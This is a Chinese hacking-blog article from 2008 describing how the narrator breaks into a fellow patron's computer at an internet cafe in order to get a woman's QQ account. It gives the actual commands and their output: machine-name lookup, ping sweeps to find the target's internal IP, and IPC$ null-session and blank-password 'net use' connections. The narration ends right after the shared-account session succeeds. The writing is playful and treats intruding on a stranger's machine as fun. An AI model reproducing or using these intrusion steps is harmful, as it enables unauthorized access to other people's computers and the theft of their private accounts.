扫一扫
关注微信公众号

实战经验:网吧入侵过程全方位剖析
2008-11-14   

好久都没来网吧了,今天一朋友来找我。外面有下着雪,实在没地方玩,又给溜进了网吧……

在以前家里没买电脑时。整天都泡这网吧,所以对他的系统设置什么还了解点,都大半年没来了……不知道有啥变化……

这网吧还不错.别的网吧都是无盘的或者就是98的.这里98和2000都有,呵.,搞入侵可方便了……

无意的看到13号坐着两MM,嘻.……入侵也由此开始了,看能不能拿到MM的QQ号……偶也找了一2000系统的机器做下,(偶找了一角落.呵.

这样比较安全点..)

打开偶可爱的CMD..先net name下看看本机情况

WANGLU05

USER2000

命令成功完成。

我本机名是WANGLU05.ping下看看IP有无什么规则

 Pinging wanglu05 [192.168.0.13] with 32 bytes of data:

Reply from 192.168.0.13: bytes=32 time<10ms TTL=64

Reply from 192.168.0.13: bytes=32 time<10ms TTL=64

Reply from 192.168.0.13: bytes=32 time<10ms TTL=64

Reply from 192.168.0.13: bytes=32 time<10ms TTL=64

IP是改了.记的以前是有一种规则的.比如我5号把.内网IP就是192.168.0.5.

这次MM在13号..IP就不能猜了...不过网吧机器名可是一样的...有路了.

Pinging WANGLU13 [192.168.0.225] with 32 bytes of data:

Reply from 192.168.0.225: bytes=32 time<10ms TTL=128

Reply from 192.168.0.225: bytes=32 time<10ms TTL=128

Reply from 192.168.0.225: bytes=32 time<10ms TTL=128

得到内网IP是192.168.0.225...偶记的以前是存在默认共享的..这次换了网管不知道他有没做防范措施....从这入手....

net use //192.168.0.225/ipc$ "" /user:"" 空连接成功..说明ipc$默认共享还在...

只是没权限...网吧的登陆用户全是一样的.而且密码为空.又让我给钻了空子.

G:/&gt;net use //192.168.0.225/ipc$ "" /user:"user04"

命令成功完成。


热词搜索:

上一篇:攻防实战:注入漏洞的利用和防范
下一篇:对韩国某CMS的一次安全检测(1)

分享到: 收藏